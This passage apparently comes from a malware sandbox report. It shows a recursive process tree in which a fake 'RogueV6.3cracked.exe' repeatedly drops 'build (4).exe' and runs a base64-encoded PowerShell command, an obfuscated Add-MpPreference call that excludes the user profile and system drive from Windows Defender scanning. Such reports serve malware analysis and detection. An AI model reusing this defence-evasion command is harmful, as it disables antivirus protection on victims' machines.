        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        10⤵
        Executes dropped EXE
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        10⤵
        
        PID:3768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        11⤵
        Executes dropped EXE
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        11⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        12⤵
        Executes dropped EXE
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        12⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        13⤵
        Executes dropped EXE
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        13⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        14⤵
        Executes dropped EXE
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        14⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        15⤵
        Executes dropped EXE
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        15⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        16⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        16⤵
        Executes dropped EXE
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        16⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        17⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        17⤵
        Executes dropped EXE
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        18⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        18⤵
        Executes dropped EXE
        
        PID:5540
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        18⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        19⤵
        Executes dropped EXE
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        19⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        20⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        20⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        21⤵
        Executes dropped EXE
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        21⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        22⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        22⤵
        Executes dropped EXE
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        22⤵
        
        PID:1456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        23⤵
        Executes dropped EXE
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        23⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        24⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        24⤵
        Executes dropped EXE
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        24⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        25⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        25⤵
        Executes dropped EXE
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        25⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        26⤵
        Executes dropped EXE
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        26⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        27⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        27⤵
        Executes dropped EXE
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        27⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        28⤵
        Executes dropped EXE
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        28⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        29⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        29⤵
        Executes dropped EXE
        
        PID:784
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        29⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6196
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        30⤵
        Executes dropped EXE
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        30⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        31⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6488
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        31⤵
        Executes dropped EXE
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        31⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        32⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        32⤵
        Executes dropped EXE
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        32⤵
        System Location Discovery: System Language Discovery
        
        PID:6772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        33⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        33⤵
        Executes dropped EXE
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        33⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        34⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        34⤵
        Executes dropped EXE
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        34⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
